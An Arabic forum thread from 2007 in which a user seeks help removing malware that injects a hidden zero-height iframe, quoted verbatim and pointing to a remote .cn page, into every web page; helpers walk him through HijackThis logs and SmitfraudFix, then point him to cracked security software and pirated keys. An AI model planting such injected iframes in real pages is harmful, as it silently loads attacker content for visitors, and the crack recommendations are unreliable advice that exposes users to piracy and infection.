• بادئ الموضوع بادئ الموضوع salahnet
  • تاريخ البدء تاريخ البدء
  • المشاهدات 1,237
الحالة
مغلق و غير مفتوح للمزيد من الردود.

salahnet

زيزوومي جديد
إنضم
21 ديسمبر 2007
المشاركات
15
مستوى التفاعل
0
النقاط
20
غير متصل
السلام عليكم روحمة الله وبركاتة

اخواني ممكن اجد حل لديكم للقضاء على هذا الفيروس

يعمل اطار في كل صفحة انترنت

<IfrAmE src=http://www.yiwumi.cn/cc/nn.htm width=50 height=0></IfrAmE> 9437

تقديري
 

الله يحييك اخوي
حمل هذا البرنامج
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

اذا انتهى التحميل ==> شغل البرنامج ==> واضغط على Do a system scan and save log
لحظات .. ويظهر لك تقرير ==> انسخه والصقه بردك القادم
 
الله يحييك اخوي
حمل هذا البرنامج
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

اذا انتهى التحميل ==> شغل البرنامج ==> واضغط على Do a system scan and save log
لحظات .. ويظهر لك تقرير ==> انسخه والصقه بردك القادم


هذا رابط التقرير

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


منتظرك اخوي
 
حدد القيمة التالية واحذفها

O8 - Extra context menu item: Download all by Net Transport - C:\Program Files\Xi\NetTransport 2\NTAddList.html

طريقة الحذف


يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


اعد تشغيل جهازك وشوف الوضع كيف صار

وبالله قولي ايش برامج الحماية اللي عندك
 
حدد القيمة التالية واحذفها

O8 - Extra context menu item: Download all by Net Transport - C:\Program Files\Xi\NetTransport 2\NTAddList.html

طريقة الحذف


يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


اعد تشغيل جهازك وشوف الوضع كيف صار

وبالله قولي ايش برامج الحماية اللي عندك

تم التطبيق با الحرف الواحد

ولاكن ما زال موجود

برنامج الحماية استخدم النود 32 واخر تحديث قبل ساعة

تقدير ي
 
اخوي اعمل صورة للمشكلة وارفعها على مركز تحميل المنتدى

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


وبالنسبة لبرنامج الحماية لي عودة لانها مخبوصة عندك
 
هذه الصور

المحدد هذه لجوجل


wh_12147099.jpg


وثقل شديد في تحميل الصفحة وفتحها

ويصل في بعض الاحيان لعدم الفتح وتعليق المتصفح


تقديري
 
شوف ياغالي ,,, حمل هذه الاداة ,,
واتبع الشرح التالي ,, لتنظيف جهازك من هذه الدعايات
و عمل تقرير بالعمليه حتى ترفقه بردك القادم ,,

رابط تحميل آخر تحديث للاداة
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي



شرح الاستخدام ,,,,,,

قم بتشغيل الملف SmitfraudFix.exe ,, وتابع الشرح كماا بهذه الصور

000.png





001.png





002.png





003.png





004.png





005.png
 
شوف ياغالي ,,, حمل هذه الاداة ,,
واتبع الشرح التالي ,, لتنظيف جهازك من هذه الدعايات
و عمل تقرير بالعمليه حتى ترفقه بردك القادم ,,

رابط تحميل آخر تحديث للاداة
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي



شرح الاستخدام ,,,,,,

بقت شرحك ولاكن توقف الجهاز اثناء تنضيف الرجستري

يعني في الخطوة الاخيره
Registry Cleaning

الى الان وهو معلق

؟؟؟
 
ها خلصت ولا بعد
 
الله يعافيك ويبارك فيك

هذا واجبنا

الان المشكلة الرئيسية انتهت ولله الحمد

اعمل تقرير هايجاك حتى اشوف برامج الحماية اللي عندك وانت قولي ايش مركب بالضبط
 
الله يعافيك ويبارك فيك

هذا واجبنا

الان المشكلة الرئيسية انتهت ولله الحمد

اعمل تقرير هايجاك حتى اشوف برامج الحماية اللي عندك وانت قولي ايش مركب بالضبط

لله الحمد

انا كنت من قبل ااعاني من مشكلة في فيروس في الشبكة (( شبكة الاتصال المحلية ))

فجربت عدى برامج حماية وهي :

AVG7
winantivirus
Norton Internet Security
Kaspersky Anti-Hacker

وقمت با ازالة الاي في جي و وين

وابقية Kaspersky Anti-Hacker
Norton Internet Security
ونود 32

وهذا التقرير :

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 08:27:51 م, on 23/12/2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal
Running processes:
C:\WINNT\Explorer.EXE
C:\WINNT\system32\igfxtray.exe
C:\WINNT\system32\hkcmd.exe
C:\Program Files\Norton Internet Security\IAMAPP.EXE
C:\WINNT\Mixer.exe
C:\Program Files\Eset\nod32kui.exe
C:\WINNT\system32\spool\drivers\w32x86\3\hpztsb07.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Hacker\KAVPF.exe
D:\relc\Real Counter X.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Documents and Settings\salah\Desktop\Zyzoom_HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = C:\windows\system32\blank.htm
O2 - BHO: NTIECatcher Class - {C56CB6B0-0D96-11D6-8C65-B2868B609932} - C:\Program Files\Xi\NetTransport 2\NTIEHelper.dll
O3 - Toolbar: @msdxmLC.dll,-1@1033,&Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\system32\msdxm.ocx
O4 - HKLM\..\Run: [IgfxTray] C:\WINNT\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINNT\system32\hkcmd.exe
O4 - HKLM\..\Run: [iamapp] C:\Program Files\Norton Internet Security\IAMAPP.EXE
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINNT\system32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [NeroCheck] C:\WINNT\system32\NeroCheck.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKUS\.DEFAULT\..\Run: [internat.exe] internat.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [^SetupICWDesktop] C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User 'Default user')
O4 - Global Startup: Kaspersky Anti-Hacker.lnk = C:\Program Files\Kaspersky Lab\Kaspersky Anti-Hacker\KAVPF.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O10 - Unknown file in Winsock LSP: c:\program files\winantivirus pro 2006\mailscan.dll
O10 - Unknown file in Winsock LSP: c:\program files\winantivirus pro 2006\mailscan.dll
O10 - Unknown file in Winsock LSP: c:\program files\winantivirus pro 2006\mailscan.dll
O10 - Unknown file in Winsock LSP: c:\program files\winantivirus pro 2006\mailscan.dll
O10 - Unknown file in Winsock LSP: c:\program files\winantivirus pro 2006\mailscan.dll
O10 - Unknown file in Winsock LSP: c:\program files\winantivirus pro 2006\mailscan.dll
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Norton Internet Security Service (NISSERV) - Symantec Corporation - C:\Program Files\Norton Internet Security\NISSERV.EXE
O23 - Service: Norton Internet Security Accounts Manager (NISUM) - Symantec Corporation - C:\Program Files\Norton Internet Security\NISUM.EXE
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Norton Internet Security Proxy Service (SymProxySvc) - Symantec Corporation - C:\Program Files\Norton Internet Security\SymProxySvc.exe
O23 - Service: Washer Security Access (wwSecSvc) - Unknown owner - C:\WINNT\system32\wwSecure.exe
--
End of file - 4840 bytes
 
اخوي الافضل انك تحذف كل ما عندك من برامج حماية وتطبق التالي

وتفضل برامج الحمايه لجهازك
((اولااا))
استخدم الكاسبر سكي 7 (( يحتاج برنامج AVG Anti-Spyware ))
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

(( تثبيت تلقائي + المفتاح + افضل الاعدادات ))


-----------------------------------

(( ثانيا))
ثبت برنامج AVG Anti-Spyware
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

رابط بديل
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


(( تثبيت تلقائي + كراك))


-----------------------------

(( ثالثااا))

تفعيل جدار الحماية للويندوز ,, عن طريق :
اضغط على إبدأ ( Run )>> تشغيل >> واكتب firewall.cpl واضغط على موافق , واعمل كما بالصوره

Enable_firewall.png




--------------------------------

(( رابعااا))

تفعيل التحديث التلقائي للويندوز ,, عن طريق :
اضغط على إبدأ >> تشغيل >> واكتب wuaucpl.cpl واضغط على موافق , واعمل كما بالصوره

Enable_update.png
 
AVG Anti-Spyware
هل استطيع استخدمة والاستغناء عن حق الفيروس

اما عن جدار الحماية انا استخدم وندوز 2000 ولم اجد خيار الجدار

اما التحديث مشغل واخر تحديث امس الليل

تقديري
 
AVG Anti-Spyware
هل استطيع استخدمة والاستغناء عن حق الفيروس

اما عن جدار الحماية انا استخدم وندوز 2000 ولم اجد خيار الجدار

اما التحديث مشغل واخر تحديث امس الليل

تقديري

صحيح نسيت ان جهازك وندوز 2000
برامج الحماية اللي عطيتك تثبيت تلقائي يمكن ما يظبط على جهازك لا تحملهم ثواني اجيبلك روابط لبرامج عادية
 
نزل الكاسبر من هذا الموضوع

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


المفاتيح من هنا

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي



AVG Anti-Spyware

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


الكراك من هنا

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


والبرنامجين ضروري مع بعض ولا تحط برامج حماية اضافية عشان لا يصير تعارض
 
نزل الكاسبر من هذا الموضوع

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


المفاتيح من هنا

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي



AVG Anti-Spyware

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


الكراك من هنا

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


والبرنامجين ضروري مع بعض ولا تحط برامج حماية اضافية عشان لا يصير تعارض


مشكور

وجاري العمل

تقديري
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى